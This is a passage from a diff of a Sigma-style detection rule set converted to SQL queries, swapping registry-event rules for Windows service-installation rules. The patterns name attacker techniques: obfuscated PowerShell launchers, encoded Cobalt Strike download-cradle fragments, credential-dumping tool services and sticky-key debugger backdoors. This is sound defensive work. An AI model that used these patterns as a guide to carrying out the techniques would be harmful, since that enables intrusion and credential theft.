'%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": 
"d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 
'%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND 
ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR 
TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath 
LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Alerts on trust record modification within the 
registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": 
"TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1546.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE 
'%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Important Windows Service Terminated With 
Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the 
RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - 
"attack.t1491.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" - }, - { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "filename": "win_system_powershell_script_installed_as_service.yml" + }, + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": 
"critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_hack_smbexec.yml" }, { - 